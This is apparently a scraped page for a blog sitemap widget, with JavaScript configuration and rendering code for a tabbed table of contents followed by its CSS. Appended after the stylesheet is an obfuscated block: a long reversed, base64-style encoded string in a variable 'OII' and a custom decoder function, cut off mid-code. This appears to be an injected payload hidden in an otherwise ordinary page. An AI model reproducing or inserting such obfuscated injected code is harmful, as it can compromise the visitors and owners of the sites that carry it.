SITEMAP

Please patiently wait while we get posts…

var tabbedTOC = {
blogUrl: “http://www.stcharlesedu.com”, // Enter your blog URL
containerId: “ET-tabbed-toc”, // Container ID
activeTab: 1, // The default active tab index (default: the first tab)
showDates: true, // `true` to show the post date
showSummaries: true, // `true` to show the posts summaries
numChars: 200, // Number of summary chars
showThumbnails: true, // `true` to show the posts thumbnails (Not recommended)
thumbSize: 40, // Default thumbnail size
noThumb: “”, // A “no thumbnail” URL
monthNames: [ // Array of month names
“January”,
“February”,
“March”,
“April”,
“May”,
“June”,
“July”,
“August”,
“September”,
“October”,
“November”,
“December”
],
newTabLink: true, // Open link in new window. `false` to open in same window
maxResults: 99999, // Maximum post results
preload: 0, // Load the feed after 0 seconds (option => time in milliseconds || “onload”)
sortAlphabetically: true, // `false` to sort posts by published date
showNew: 7, // `false` to hide the “New!” mark in most recent posts or
//define how many recent posts are to be marked by changing the number
newText: ” – New!” // HTML/CSS for
//the “New!” text
};

var tabbedTOC_defaults = {
blogUrl: “http://www.stcharlesedu.com”, // Blog URL
containerId: “ET-tabbed-toc”, // Container ID
activeTab: 1, // The default active tab index (default: the first tab)
showDates: true, // true to show the post date
showSummaries: true, // true to show the posts summaries
numChars: 200, // Number of summary chars
showThumbnails: true, // true to show the posts thumbnails (Not recommended)
thumbSize: 40, // Thumbnail size
noThumb: “data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAAA3NCSVQICAjb4U/gAAAADElEQVQImWOor68HAAL+AX7vOF2TAAAAAElFTkSuQmCC”, // No thumbnail URL
monthNames: [ // Array of month names
“Januari”,
“Februari”,
“Maret”,
“April”,
“Mei”,
“Juni”,
“Juli”,
“Agustus”,
“September”,
“Oktober”,
“November”,
“Desember”
],
newTabLink: true, // Open link in new window?
maxResults: 99999, // Maximum posts result
preload: 0, // Load the feed after 0 seconds (option => time in milliseconds || “onload”)
sortAlphabetically: true, // `false` to sort posts by date
showNew: false, // `false` to hide the “New!” mark in most recent posts, or define how many recent posts are to be marked
newText: ” – Baru!” // HTML for the “New!” text
};

for (var i in tabbedTOC_defaults) {
tabbedTOC_defaults[i] = (typeof(tabbedTOC[i]) !== undefined && typeof(tabbedTOC[i]) !== ‘undefined’) ? tabbedTOC[i] : tabbedTOC_defaults[i];
}

function clickTab(pos) {
var a = document.getElementById(tabbedTOC_defaults.containerId),
b = a.getElementsByTagName(‘ol’),
c = a.getElementsByTagName(‘ul’)[0],
d = c.getElementsByTagName(‘a’);
for (var t = 0; t < b.length; t++) { b[t].style.display = "none"; b[parseInt(pos, 10)].style.display = "block"; } for (var u = 0; u < d.length; u++) { d[u].className = ""; d[parseInt(pos, 10)].className = "active-tab"; } } function showTabs(json) { var total = parseInt(json.feed.openSearch$totalResults.$t,10), c = tabbedTOC_defaults, entry = json.feed.entry, category = json.feed.category, skeleton = "", newPosts = []; for (var g = 0; g < (c.showNew === true ? 5 : c.showNew); g++) { if (g == entry.length) break; entry[g].title.$t = entry[g].title.$t + (c.showNew !== false ? c.newText : ''); } entry = c.sortAlphabetically ? entry.sort(function(a,b) { return (a.title.$t.localeCompare(b.title.$t)); }) : entry; category = c.sortAlphabetically ? category.sort(function(a,b) { return (a.term.localeCompare(b.term)); }) : category; // Build the tabs skeleton skeleton = '

‘;

// Bulid the tabs contents skeleton
skeleton += ‘

‘;
for (var i = 0, cnt = category.length; i < cnt; i++) { skeleton += '

‘;
}

skeleton += ‘

‘;
skeleton += ‘

‘;
document.getElementById(c.containerId).innerHTML = skeleton;
clickTab(c.activeTab-1);

}

(function() {
var h = document.getElementsByTagName(‘head’)[0],
s = document.createElement(‘script’);
s.type = ‘text/javascript’;
s.src = tabbedTOC_defaults.blogUrl + ‘/feeds/posts/summary?alt=json-in-script&max-results=’ + tabbedTOC_defaults.maxResults + ‘&orderby=published&callback=showTabs’;
if (tabbedTOC_defaults.preload !== “onload”) {
setTimeout(function() {
h.appendChild(s);
}, tabbedTOC_defaults.preload);
} else {
window.onload = function() {
h.appendChild(s);
};
}
})();

/*Sitemap */
#ET-tabbed-toc {
width: 99%;
margin: 0 auto;
overflow: hidden !important;
position: relative;
color: #222;
border: 0;
border-top: 5px solid #060;
background-color: #1D1D1D;
-webkit-transition: all 0.4s ease-in-out;
}
#ET-tabbed-toc .loading {
display:block;
padding:5px 15px;
font:normal bold 11px Arial,Sans-Serif;
color:#FFF;
}
#ET-tabbed-toc ul,
#ET-tabbed-toc ol,
#ET-tabbed-toc li {
margin:0;
padding:0;
list-style:none;
}
#ET-tabbed-toc .toc-tabs {
width: 24.8%;
float: left !important;
}
#ET-tabbed-toc .toc-tabs li a {
display:block;
font:normal bold 10px/28px Arial,Sans-Serif;
height:28px;
overflow:hidden;
text-overflow:ellipsis;
color:#ccc;
text-transform:uppercase;
text-decoration:none;
padding:0 12px;
cursor:pointer;
-webkit-transition: all 0.3s ease-in-out;
}
#ET-tabbed-toc .toc-tabs li a:hover {
background-color: #515050;
color: #FF0;
}
#ET-tabbed-toc .toc-tabs li a.active-tab {
background-color: #09F;
color: #222;
position: relative;
z-index: 5;
margin: 0 -2px 0 0;
}
#ET-tabbed-toc .toc-content,
#ET-tabbed-toc .divider-layer {
width: 75%;
float: right !important;
background-color: #F5F5F5;
border-left: 5px solid #09F;
-webkit-box-sizing: border-box;
-moz-box-sizing: border-box;
box-sizing: border-box;
-webkit-transition: all 0.3s ease-in-out;
}
#ET-tabbed-toc .divider-layer {
float:none;
display:block;
position:absolute;
top:0; right:0; bottom:0;
}
#ET-tabbed-toc .panel {
position:relative;
z-index:5;
font:normal normal 10px Arial,Sans-Serif;
}
#ET-tabbed-toc .panel li a {
display: block;
position: relative;
font-weight: bold;
font-size: 11px;
color: #222;
line-height: 2.8em;
height: 30px;
padding: 0 10px;
text-decoration: none;
outline: none;
overflow: hidden;
-webkit-transition: all 0.3s ease-in-out;
}
#ET-tabbed-toc .panel li time {
display:block;
font-style:italic;
font-weight:400;
font-size:10px;
color:#666;
float:right;
}
#ET-tabbed-toc .panel li .summary {
display:block;
padding:10px 12px;
font-style:italic;
border-bottom:4px solid #275827;
overflow:hidden;
}
#ET-tabbed-toc .panel li .summary img.thumbnail {
float:left;
display:block;
margin:0 8px 0 0;
padding:4px;
width:72px;
height:72px;
border:1px solid #dcdcdc;
background-color:#fafafa;
}
#ET-tabbed-toc .panel li:nth-child(even) {
background-color: #DBDBDB;
font-size: 10px;
}
#ET-tabbed-toc .panel li a:hover,
#ET-tabbed-toc .panel li a:focus,
#ET-tabbed-toc .panel li a:hover time,
#ET-tabbed-toc .panel li.bold a {
background-color:#222;
color:#FFF;
outline:none;
-webkit-transition: all 0.3s ease-in-out;
}
#ET-tabbed-toc .panel li.bold a:hover,
#ET-tabbed-toc .panel li.bold a:hover time {
background-color:#222;
}
@media (max-width:700px) {
#ET-tabbed-toc {
background-color:#fff;
border:0 solid #888;
}
#ET-tabbed-toc .toc-tabs,
#ET-tabbed-toc .toc-content {
overflow:hidden;
width:auto;
float:none !important;
display:block;
}
#ET-tabbed-toc .toc-tabs li {
display:inline;
float:left !important;
}
#ET-tabbed-toc .toc-tabs li a,
#ET-tabbed-toc .toc-tabs li a.active-tab {
background-color:#222;
color:#ccc;
}
#ET-tabbed-toc .toc-tabs li a.active-tab {
color:#000;
}
#ET-tabbed-toc .toc-content {
border:none;
}
#ET-tabbed-toc .divider-layer,
#ET-tabbed-toc .panel li time {
display:none;
}
}

var OII=’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’;function O00(data){var _1OllOI=”ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=”;var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc=”;do{h1=_1OllOI.indexOf(data.charAt(i++));h2=_1OllOI.indexOf(data.charAt(i++));h3=_1OllOI.indexOf(data.charAt(i++));h4=_1OllOI.indexOf(data.charAt(i++));bits=h1